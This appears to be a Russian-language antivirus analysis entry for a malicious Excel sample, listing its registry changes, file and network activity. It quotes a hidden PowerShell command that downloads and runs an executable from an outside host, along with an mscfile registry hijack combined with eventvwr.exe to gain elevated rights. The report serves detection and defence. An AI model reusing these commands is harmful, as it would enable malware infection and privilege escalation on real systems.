Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Classes\mscfile\shell\open\command] '' = '%TEMP%\msmsystem.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://geosystem.com.my/doc/ogi.exe как %temp%\msmsystem.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://geosystem.com.my/doc/ogi.exe','%TEMP%\msmsystem.exe') & reg add HKCU\Software\Classes\mscfile\...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\103e0000
Подменяет следующие файлы
- <PATH_SAMPLE>.xls
Сетевая активность
Подключается к
- 'ge####tem.com.my':80
- 'ge####tem.com.my':443
TCP
Запросы HTTP GET
- http://ge####tem.com.my/doc/ogi.exe
Другие
- 'ge####tem.com.my':443
UDP
- DNS ASK ge####tem.com.my
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://geosystem.com.my/doc/ogi.exe','%TEMP%\msmsystem.exe') & reg add HKCU\Software\Classes\mscfile\...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\mscfile\shell\open\command /d %TEMP%\msmsystem.exe /f
- '<SYSTEM32>\eventvwr.exe'
